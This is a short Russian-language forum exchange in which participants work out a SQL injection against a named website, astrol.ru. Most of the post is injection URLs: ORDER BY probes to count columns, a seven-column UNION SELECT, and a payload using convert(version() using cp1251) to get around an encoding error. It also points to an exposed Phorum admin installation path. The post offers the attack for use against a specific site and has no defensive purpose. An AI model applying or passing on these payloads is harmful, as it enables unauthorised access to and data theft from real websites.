Сообщение от
Barney
до 15 дошел. дальше не пробовал
http://astrol.ru/index.php?page=125'+UNION+SELECT+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15/*
хотя как я понял конструкция ордер бай действует так:
если больше например 15 столбцов - мы получаем корректный ответ. если меньше - ошибку.
ну вот
http://astrol.ru/index.php?page=125'+order+by+15/*
Код:
http://astrol.ru/index.php?page=125+order+by+7/*
Код:
http://astrol.ru/index.php?page=125+order+by+8/*
при 8 ошибка, значит столбцов меньше, чем 8
при 7 нет ошибки, значит столбцов 7, логично?
Код:
http://astrol.ru/index.php?page=-1+union+select+1,2,3,4,5,6,7/*
rtfm
ps: опережая следующий вопрос:
вывод в 5ку... ошибка при выводе 'version()'
как выяснилось, несоответствие кодировок.
http://astrol.ru/index.php?page=-1+union+select+1,2,3,4,convert(version()+using+cp1 251),6,7/*
pps: гм... http://astrol.ru/forum/admin/ инсталляшка Phorum'а)